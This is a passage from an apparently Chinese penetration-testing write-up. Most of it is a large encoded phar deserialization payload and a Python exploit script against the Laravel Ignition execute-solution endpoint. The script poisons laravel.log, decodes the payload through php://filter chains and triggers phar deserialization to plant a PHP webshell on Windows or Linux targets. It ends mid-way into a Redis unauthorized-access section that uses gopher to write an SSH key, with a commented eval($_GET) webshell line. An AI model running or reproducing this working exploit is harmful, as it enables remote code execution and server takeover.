0=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=34=00=4D=00=44=00=41=00=36=00=49=00=6D=00=56=00=6A=00=61=00=47=00=38=00=67=00=55=00=45=00=51=00=35=00=64=00=32=00=46=00=49=00=51=00=57=00=64=00=4A=00=53=00=45=00=35=00=73=00=59=00=7A=00=4E=00=4F=00=63=00=47=00=49=00=79=00=4E=00=57=00=5A=00=6A=00=4D=00=31=00=4A=00=6F=00=59=00=32=00=35=00=52=00=62=00=30=00=74=00=55=00=64=00=45=00=46=00=6A=00=4D=00=6C=00=59=00=77=00=57=00=44=00=4E=00=53=00=63=00=47=00=4A=00=58=00=56=00=6D=00=5A=00=69=00=52=00=32=00=78=00=30=00=59=00=56=00=68=00=52=00=62=00=30=00=31=00=44=00=61=00=7A=00=64=00=52=00=52=00=31=00=5A=00=35=00=59=00=32=00=30=00=35=00=65=00=56=00=67=00=7A=00=53=00=6D=00=78=00=6A=00=52=00=7A=00=6C=00=35=00=5A=00=45=00=64=00=73=00=64=00=56=00=70=00=35=00=5A=00=33=00=64=00=4C=00=56=00=48=00=52=00=74=00=5A=00=46=00=63=00=31=00=61=00=6D=00=52=00=48=00=62=00=48=00=5A=00=69=00=61=00=55=00=4A=00=47=00=53=00=30=00=4E=00=53=00=52=00=55=00=78=00=44=00=55=00=6B=00=78=00=4C=00=57=00=48=00=52=00=74=00=59=00=6A=00=4E=00=4A=00=62=00=30=00=70=00=48=00=61=00=7A=00=6C=00=4A=00=52=00=45=00=46=00=6E=00=54=00=33=00=6C=00=53=00=63=00=46=00=42=00=49=00=54=00=6A=00=42=00=6A=00=62=00=58=00=68=00=73=00=59=00=6D=00=6C=00=6E=00=61=00=31=00=4A=00=44=00=61=00=7A=00=64=00=4B=00=52=00=32=00=74=00=79=00=53=00=33=00=6C=00=73=00=4E=00=30=00=70=00=46=00=55=00=6D=00=4A=00=4B=00=52=00=32=00=78=00=6B=00=55=00=46=00=4E=00=53=00=52=00=56=00=64=00=35=00=55=00=6E=00=42=00=59=00=56=00=6A=00=52=00=72=00=55=00=7A=00=46=00=7A=00=61=00=32=00=46=00=54=00=63=00=32=00=64=00=4E=00=55=00=30=00=46=00=74=00=53=00=55=00=52=00=46=00=4D=00=55=00=6C=00=47=00=4D=00=44=00=64=00=6D=00=57=00=45=00=70=00=73=00=5A=00=45=00=68=00=57=00=65=00=57=00=4A=00=70=00=55=00=6B=00=56=00=50=00=4D=00=7A=00=46=00=74=00=5A=00=46=00=63=00=31=00=61=00=6D=00=52=00=48=00=62=00=48=00=5A=00=69=00=61=00=55=00=4A=00=53=00=53=00=30=00=4E=00=53=00=52=00=55=00=74=00=59=00=64=00=48=00=6C=00=61=00=57=00=46=00=49=00=78=00=59=00=32=00=30=00=30=00=5A=00=31=00=6C=00=74=00=52=00=6E=00=70=00=61=00=56=00=46=00=6B=00=77=00=57=00=44=00=4A=00=57=00=64=00=56=00=6B=00=79=00=4F=00=57=00=74=00=61=00=55=00=32=00=64=00=72=00=55=00=6B=00=4E=00=72=00=4E=00=32=00=5A=00=58=00=57=00=6A=00=46=00=69=00=62=00=55=00=34=00=77=00=59=00=56=00=63=00=35=00=64=00=55=00=6C=00=46=00=4F=00=47=00=39=00=4B=00=52=00=56=00=46=00=77=00=5A=00=54=00=4E=00=4B=00=62=00=47=00=52=00=49=00=56=00=6E=00=6C=00=69=00=61=00=55=00=4A=00=70=00=57=00=56=00=68=00=4F=00=62=00=45=00=35=00=71=00=55=00=6D=00=5A=00=61=00=52=00=31=00=5A=00=71=00=59=00=6A=00=4A=00=53=00=62=00=45=00=74=00=44=00=55=00=6B=00=56=00=4C=00=56=00=48=00=51=00=35=00=53=00=6B=00=5A=00=42=00=4F=00=55=00=6F=00=7A=00=51=00=6D=00=68=00=6A=00=4D=00=30=00=31=00=75=00=54=00=33=00=6C=00=53=00=56=00=31=00=42=00=54=00=5A=00=48=00=64=00=5A=00=57=00=47=00=78=00=7A=00=59=00=6A=00=4A=00=47=00=61=00=30=00=70=00=36=00=63=00=32=00=74=00=57=00=52=00=44=00=42=00=75=00=54=00=54=00=4A=00=4E=00=4D=00=6C=00=70=00=55=00=51=00=6D=00=6C=00=50=00=52=00=30=00=55=00=31=00=57=00=58=00=70=00=46=00=4D=00=55=00=31=00=71=00=53=00=54=00=42=00=5A=00=55=00=32=00=4D=00=33=00=59=00=56=00=64=00=5A=00=62=00=32=00=46=00=59=00=54=00=6E=00=70=00=61=00=57=00=46=00=46=00=76=00=53=00=6B=00=59=00=35=00=55=00=56=00=51=00=78=00=54=00=6C=00=56=00=58=00=65=00=56=00=4A=00=52=00=57=00=46=00=4E=00=72=00=63=00=47=00=56=00=35=00=55=00=6B=00=64=00=51=00=56=00=54=00=68=00=76=00=55=00=6C=00=4E=00=6F=00=55=00=45=00=74=00=44=00=55=00=6D=00=5A=00=56=00=52=00=54=00=6C=00=55=00=56=00=6B=00=5A=00=7A=00=61=00=31=00=56=00=47=00=4D=00=48=00=42=00=4D=00=51=00=31=00=4A=00=56=00=53=00=31=00=4E=00=72=00=4E=00=32=00=46=00=58=00=57=00=57=00=39=00=68=00=57=00=45=00=35=00=36=00=57=00=6C=00=68=00=52=00=62=00=30=00=70=00=47=00=4F=00=56=00=52=00=53=00=56=00=6B=00=35=00=55=00=55=00=31=00=55=00=35=00=54=00=31=00=64=00=35=00=55=00=6C=00=64=00=59=00=55=00=32=00=74=00=77=00=5A=00=58=00=6C=00=53=00=54=00=56=00=42=00=54=00=55=00=6D=00=5A=00=56=00=4D=00=46=00=5A=00=55=00=56=00=54=00=42=00=73=00=55=00=46=00=52=00=73=00=63=00=32=00=74=00=57=00=62=00=44=00=41=00=33=00=53=00=6B=00=56=00=46=00=4F=00=56=00=70=00=59=00=61=00=48=00=64=00=69=00=52=00=7A=00=6C=00=72=00=57=00=6C=00=4E=00=6E=00=62=00=6D=00=5A=00=44=00=59=00=33=00=4E=00=4B=00=52=00=58=00=64=00=77=00=54=00=7A=00=4A=00=4F=00=63=00=31=00=6C=00=59=00=54=00=6E=00=70=00=4A=00=52=00=55=00=34=00=33=00=59=00=30=00=68=00=57=00=61=00=57=00=4A=00=48=00=62=00=47=00=70=00=4A=00=52=00=31=00=6F=00=78=00=59=00=6D=00=31=00=4F=00=4D=00=47=00=46=00=58=00=4F=00=58=00=56=00=4A=00=52=00=7A=00=55=00=79=00=59=00=6A=00=4A=00=30=00=62=00=45=00=74=00=44=00=55=00=6E=00=64=00=4C=00=57=00=48=00=52=00=73=00=5A=00=47=00=31=00=47=00=63=00=30=00=74=00=44=00=55=00=6E=00=64=00=4D=00=61=00=55=00=6C=00=70=00=53=00=31=00=52=00=30=00=4F=00=57=00=5A=00=54=00=55=00=6C=00=4E=00=51=00=56=00=7A=00=56=00=73=00=5A=00=48=00=6C=00=43=00=52=00=45=00=74=00=44=00=61=00=7A=00=64=00=4B=00=52=00=6B=00=6C=00=30=00=55=00=47=00=30=00=31=00=4D=00=6D=00=49=00=79=00=64=00=47=00=78=00=4C=00=51=00=31=00=4A=00=43=00=56=00=33=00=6C=00=42=00=64=00=30=00=6C=00=47=00=4D=00=48=00=42=00=50=00=4D=00=6C=00=5A=00=71=00=59=00=55=00=63=00=34=00=5A=00=32=00=4D=00=7A=00=56=00=6D=00=6C=00=6A=00=4D=00=31=00=4A=00=35=00=53=00=30=00=63=00=78=00=61=00=30=00=35=00=54=00=5A=00=32=00=74=00=56=00=51=00=7A=00=52=00=72=00=56=00=6B=00=4E=00=72=00=63=00=30=00=6C=00=45=00=51=00=57=00=64=00=4D=00=51=00=30=00=46=00=34=00=54=00=6D=00=6C=00=42=00=63=00=45=00=38=00=79=00=56=00=6D=00=70=00=68=00=52=00=7A=00=68=00=6E=00=56=00=56=00=4E=00=6F=00=52=00=6B=00=74=00=46=00=51=00=6E=00=6C=00=6B=00=56=00=7A=00=52=00=76=00=53=00=6B=00=56=00=5A=00=63=00=45=00=78=00=44=00=55=00=6C=00=56=00=4C=00=55=00=32=00=73=00=33=00=57=00=6C=00=64=00=4F=00=62=00=32=00=4A=00=35=00=51=00=6E=00=70=00=6B=00=56=00=30=00=70=00=36=00=5A=00=45=00=68=00=4A=00=62=00=32=00=4A=00=58=00=55=00=54=00=46=00=4C=00=51=00=31=00=4A=00=52=00=54=00=47=00=6C=00=53=00=56=00=55=00=74=00=54=00=64=00=32=00=64=00=4E=00=56=00=46=00=6C=00=6E=00=53=00=31=00=52=00=30=00=4F=00=56=00=70=00=58=00=65=00=48=00=70=00=61=00=57=00=48=00=4E=00=72=00=57=00=44=00=46=00=4F=00=52=00=6C=00=55=00=78=00=54=00=6B=00=70=00=55=00=4D=00=44=00=56=00=69=00=53=00=6B=00=5A=00=61=00=5A=00=46=00=42=00=54=00=55=00=6B=00=64=00=50=00=4D=00=7A=00=45=00=35=00=49=00=48=00=77=00=67=00=59=00=6D=00=46=00=7A=00=5A=00=54=00=59=00=30=00=49=00=43=00=31=00=6B=00=49=00=44=00=34=00=75=00=4C=00=32=00=5A=00=31=00=59=00=32=00=74=00=35=00=62=00=33=00=55=00=75=00=63=00=47=00=68=00=77=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6C=00=4E=00=70=00=65=00=6D=00=55=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4F=00=44=00=41=00=77=00=4F=00=69=00=4A=00=6C=00=59=00=32=00=68=00=76=00=49=00=46=00=42=00=45=00=4F=00=58=00=64=00=68=00=53=00=45=00=46=00=6E=00=53=00=55=00=68=00=4F=00=62=00=47=00=4D=00=7A=00=54=00=6E=00=42=00=69=00=4D=00=6A=00=56=00=6D=00=59=00=7A=00=4E=00=53=00=61=00=47=00=4E=00=75=00=55=00=57=00=39=00=4C=00=56=00=48=00=52=00=42=00=59=00=7A=00=4A=00=57=00=4D=00=46=00=67=00=7A=00=55=00=6E=00=42=00=69=00=56=00=31=00=5A=00=6D=00=59=00=6B=00=64=00=73=00=64=00=47=00=46=00=59=00=55=00=57=00=39=00=4E=00=51=00=32=00=73=00=33=00=55=00=55=00=64=00=57=00=65=00=57=00=4E=00=74=00=4F=00=58=00=6C=00=59=00=4D=00=30=00=70=00=73=00=59=00=30=00=63=00=35=00=65=00=57=00=52=00=48=00=62=00=48=00=56=00=61=00=65=00=57=00=64=00=33=00=53=00=31=00=52=00=30=00=62=00=57=00=52=00=58=00=4E=00=57=00=70=00=6B=00=52=00=32=00=78=00=32=00=59=00=6D=00=6C=00=43=00=52=00=6B=00=74=00=44=00=55=00=6B=00=56=00=4D=00=51=00=31=00=4A=00=4D=00=53=00=31=00=68=00=30=00=62=00=57=00=49=00=7A=00=53=00=57=00=39=00=4B=00=52=00=32=00=73=00=35=00=53=00=55=00=52=00=42=00=5A=00=30=00=39=00=35=00=55=00=6E=00=42=00=51=00=53=00=45=00=34=00=77=00=59=00=32=00=31=00=34=00=62=00=47=00=4A=00=70=00=5A=00=32=00=74=00=53=00=51=00=32=00=73=00=33=00=53=00=6B=00=64=00=72=00=63=00=6B=00=74=00=35=00=62=00=44=00=64=00=4B=00=52=00=56=00=4A=00=69=00=53=00=6B=00=64=00=73=00=5A=00=46=00=42=00=54=00=55=00=6B=00=56=00=58=00=65=00=56=00=4A=00=77=00=57=00=46=00=59=00=30=00=61=00=31=00=4D=00=78=00=63=00=32=00=74=00=68=00=55=00=33=00=4E=00=6E=00=54=00=56=00=4E=00=42=00=62=00=55=00=6C=00=45=00=52=00=54=00=46=00=4A=00=52=00=6A=00=41=00=33=00=5A=00=6C=00=68=00=4B=00=62=00=47=00=52=00=49=00=56=00=6E=00=6C=00=69=00=61=00=56=00=4A=00=46=00=54=00=7A=00=4D=00=78=00=62=00=57=00=52=00=58=00=4E=00=57=00=70=00=6B=00=52=00=32=00=78=00=32=00=59=00=6D=00=6C=00=43=00=55=00=6B=00=74=00=44=00=55=00=6B=00=56=00=4C=00=57=00=48=00=52=00=35=00=57=00=6C=00=68=00=53=00=4D=00=57=00=4E=00=74=00=4E=00=47=00=64=00=5A=00=62=00=55=00=5A=00=36=00=57=00=6C=00=52=00=5A=00=4D=00=46=00=67=00=79=00=56=00=6E=00=56=00=5A=00=4D=00=6A=00=6C=00=72=00=57=00=6C=00=4E=00=6E=00=61=00=31=00=4A=00=44=00=61=00=7A=00=64=00=6D=00=56=00=31=00=6F=00=78=00=59=00=6D=00=31=00=4F=00=4D=00=47=00=46=00=58=00=4F=00=58=00=56=00=4A=00=52=00=54=00=68=00=76=00=53=00=6B=00=56=00=52=00=63=00=47=00=55=00=7A=00=53=00=6D=00=78=00=6B=00=53=00=46=00=5A=00=35=00=59=00=6D=00=6C=00=43=00=61=00=56=00=6C=00=59=00=54=00=6D=00=78=00=4F=00=61=00=6C=00=4A=00=6D=00=57=00=6B=00=64=00=57=00=61=00=6D=00=49=00=79=00=55=00=6D=00=78=00=4C=00=51=00=31=00=4A=00=46=00=53=00=31=00=52=00=30=00=4F=00=55=00=70=00=47=00=51=00=54=00=6C=00=4B=00=4D=00=30=00=4A=00=6F=00=59=00=7A=00=4E=00=4E=00=62=00=6B=00=39=00=35=00=55=00=6C=00=64=00=51=00=55=00=32=00=52=00=33=00=57=00=56=00=68=00=73=00=63=00=32=00=49=00=79=00=52=00=6D=00=74=00=4B=00=65=00=6E=00=4E=00=72=00=56=00=6B=00=51=00=77=00=62=00=6B=00=30=00=79=00=54=00=54=00=4A=00=61=00=56=00=45=00=4A=00=70=00=54=00=30=00=64=00=46=00=4E=00=56=00=6C=00=36=00=52=00=54=00=46=00=4E=00=61=00=6B=00=6B=00=77=00=57=00=56=00=4E=00=6A=00=4E=00=32=00=46=00=58=00=57=00=57=00=39=00=68=00=57=00=45=00=35=00=36=00=57=00=6C=00=68=00=52=00=62=00=30=00=70=00=47=00=4F=00=56=00=46=00=55=00=4D=00=55=00=35=00=56=00=56=00=33=00=6C=00=53=00=55=00=56=00=68=00=54=00=61=00=33=00=42=00=6C=00=65=00=56=00=4A=00=48=00=55=00=46=00=55=00=34=00=62=00=31=00=4A=00=54=00=61=00=46=00=42=00=4C=00=51=00=31=00=4A=00=6D=00=56=00=55=00=55=00=35=00=56=00=46=00=5A=00=47=00=63=00=32=00=74=00=56=00=52=00=6A=00=42=00=77=00=54=00=45=00=4E=00=53=00=56=00=55=00=74=00=54=00=61=00=7A=00=64=00=68=00=56=00=31=00=6C=00=76=00=59=00=56=00=68=00=4F=00=65=00=6C=00=70=00=59=00=55=00=57=00=39=00=4B=00=52=00=6A=00=6C=00=55=00=55=00=6C=00=5A=00=4F=00=56=00=46=00=4E=00=56=00=4F=00=55=00=39=00=58=00=65=00=56=00=4A=00=58=00=57=00=46=00=4E=00=72=00=63=00=47=00=56=00=35=00=55=00=6B=00=31=00=51=00=55=00=31=00=4A=00=6D=00=56=00=54=00=42=00=57=00=56=00=46=00=55=00=77=00=62=00=46=00=42=00=55=00=62=00=48=00=4E=00=72=00=56=00=6D=00=77=00=77=00=4E=00=30=00=70=00=46=00=52=00=54=00=6C=00=61=00=57=00=47=00=68=00=33=00=59=00=6B=00=63=00=35=00=61=00=31=00=70=00=54=00=5A=00=32=00=35=00=6D=00=51=00=32=00=4E=00=7A=00=53=00=6B=00=56=00=33=00=63=00=45=00=38=00=79=00=54=00=6E=00=4E=00=5A=00=57=00=45=00=35=00=36=00=53=00=55=00=56=00=4F=00=4E=00=32=00=4E=00=49=00=56=00=6D=00=6C=00=69=00=52=00=32=00=78=00=71=00=53=00=55=00=64=00=61=00=4D=00=57=00=4A=00=74=00=54=00=6A=00=42=00=68=00=56=00=7A=00=6C=00=31=00=53=00=55=00=63=00=31=00=4D=00=6D=00=49=00=79=00=64=00=47=00=78=00=4C=00=51=00=31=00=4A=00=33=00=53=00=31=00=68=00=30=00=62=00=47=00=52=00=74=00=52=00=6E=00=4E=00=4C=00=51=00=31=00=4A=00=33=00=54=00=47=00=6C=00=4A=00=61=00=55=00=74=00=55=00=64=00=44=00=6C=00=6D=00=55=00=31=00=4A=00=54=00=55=00=46=00=63=00=31=00=62=00=47=00=52=00=35=00=51=00=6B=00=52=00=4C=00=51=00=32=00=73=00=33=00=53=00=6B=00=5A=00=4A=00=64=00=46=00=42=00=74=00=4E=00=54=00=4A=00=69=00=4D=00=6E=00=52=00=73=00=53=00=30=00=4E=00=53=00=51=00=6C=00=64=00=35=00=51=00=58=00=64=00=4A=00=52=00=6A=00=42=00=77=00=54=00=7A=00=4A=00=57=00=61=00=6D=00=46=00=48=00=4F=00=47=00=64=00=6A=00=4D=00=31=00=5A=00=70=00=59=00=7A=00=4E=00=53=00=65=00=55=00=74=00=48=00=4D=00=57=00=74=00=4F=00=55=00=32=00=64=00=72=00=56=00=55=00=4D=00=30=00=61=00=31=00=5A=00=44=00=61=00=33=00=4E=00=4A=00=52=00=45=00=46=00=6E=00=54=00=45=00=4E=00=42=00=65=00=45=00=35=00=70=00=51=00=58=00=42=00=50=00=4D=00=6C=00=5A=00=71=00=59=00=55=00=63=00=34=00=5A=00=31=00=56=00=54=00=61=00=45=00=5A=00=4C=00=52=00=55=00=4A=00=35=00=5A=00=46=00=63=00=30=00=62=00=30=00=70=00=46=00=57=00=58=00=42=00=4D=00=51=00=31=00=4A=00=56=00=53=00=31=00=4E=00=72=00=4E=00=31=00=70=00=58=00=54=00=6D=00=39=00=69=00=65=00=55=00=4A=00=36=00=5A=00=46=00=64=00=4B=00=65=00=6D=00=52=00=49=00=53=00=57=00=39=00=69=00=56=00=31=00=45=00=78=00=53=00=30=00=4E=00=53=00=55=00=55=00=78=00=70=00=55=00=6C=00=56=00=4C=00=55=00=33=00=64=00=6E=00=54=00=56=00=52=00=5A=00=5A=00=30=00=74=00=55=00=64=00=44=00=6C=00=61=00=56=00=33=00=68=00=36=00=57=00=6C=00=68=00=7A=00=61=00=31=00=67=00=78=00=54=00=6B=00=5A=00=56=00=4D=00=55=00=35=00=4B=00=56=00=44=00=41=00=31=00=59=00=6B=00=70=00=47=00=57=00=6D=00=52=00=51=00=55=00=31=00=4A=00=48=00=54=00=7A=00=4D=00=78=00=4F=00=53=00=42=00=38=00=49=00=47=00=4A=00=68=00=63=00=32=00=55=00=32=00=4E=00=43=00=41=00=74=00=5A=00=43=00=41=00=2B=00=4C=00=69=00=39=00=6D=00=64=00=57=00=4E=00=72=00=65=00=57=00=39=00=31=00=4C=00=6E=00=42=00=6F=00=63=00=43=00=49=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=57=00=51=00=69=00=4F=00=32=00=49=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=4D=00=61=00=57=00=31=00=70=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=62=00=33=00=4A=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6E=00=4A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=66=00=58=00=31=00=39=00=42=00=51=00=41=00=41=00=41=00=47=00=52=00=31=00=62=00=57=00=31=00=35=00=42=00=41=00=41=00=41=00=41=00=44=00=77=00=7A=00=43=00=6D=00=41=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=51=00=75=00=64=00=48=00=68=00=30=00=42=00=41=00=41=00=41=00=41=00=44=00=77=00=7A=00=43=00=6D=00=41=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=53=00=6D=00=31=00=59=00=37=00=6B=00=34=00=32=00=72=00=2B=00=63=00=49=00=36=00=74=00=78=00=58=00=67=00=47=00=6A=00=36=00=46=00=66=00=4A=00=33=00=72=00=43=00=58=00=51=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def filterlog(url):
data={
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def phar(url,path):
data={
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName":"username",
"viewFile": "phar://"+path+"\storage\\logs\\laravel.log\\test.txt"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def pharl(url,path):
data={
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName":"username",
"viewFile": "phar://"+path+"/storage/logs/laravel.log/test.txt"
}
}
req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
return req
def path(url):
req=requests.get(url).text
pattern = re.compile(r'(\#\d*\ (.*)(?:\/|\\)vendor)')
m=pattern.findall(req)
return m[0][1]
if __name__=='__main__':
print(
'''
██████ ▓█████ ▄████▄ ██▓███ ██▀███ ▒█████ ██████
▒██ ▒ ▓█ ▀ ▒██▀ ▀█ ▓██░ ██▒▓██ ▒ ██▒▒██▒ ██▒▒██ ▒
░ ▓██▄ ▒███ ▒▓█ ▄ ▓██░ ██▓▒▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄
▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒▒██▄█▓▒ ▒▒██▀▀█▄ ▒██ ██░ ▒ ██▒
▒██████▒▒░▒████▒▒ ▓███▀ ░▒██▒ ░ ░░██▓ ▒██▒░ ████▓▒░▒██████▒▒
▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░▒▓▒░ ░ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░
░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ░▒ ░ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░
░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░
░ ░ ░░ ░ ░ ░ ░ ░
░
''')
url=sys.argv[1]+"/_ignition/execute-solution"
clearlog(url)
clearlog(url)
clearlog(url)
clearlog(url)
clearlog(url)
if(AA(url).status_code==500):
if(":" in path(url)):
print("windows")
if(sendpayloadwindows(url).status_code==500):
if(filterlog(url).status_code==200):
if(phar(url,path(url)).status_code==500):
if(requests.get(sys.argv[1]+"/fuckyou.php").status_code==200):
print("[+]webshell地址:"+sys.argv[1]+"/fuckyou.php,密码:pass")
else:
print("[-]漏洞不存在")
if(":" not in path(url)):
print("linux")
if(sendpayloadlinux(url).status_code==500):
if(filterlog(url).status_code==200):
if(pharl(url,path(url)).status_code==500):
if(requests.get(sys.argv[1]+"/fuckyou.php").status_code==200):
print("webshell地址:"+sys.argv[1]+"/fuckyou.php,密码:pass")
else:
print("[-]漏洞不存在")
WebShell如下:
2.2 Redis未授权Getshell
利用Redis写入公钥来进行GetShell
kali下执行 ssh-keygen -t rsa,然后将id_rsa.pub复制到我们的脚本payload中:
import urllib
protocol="gopher://"
ip="172.16.10.234"
port="6379"
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
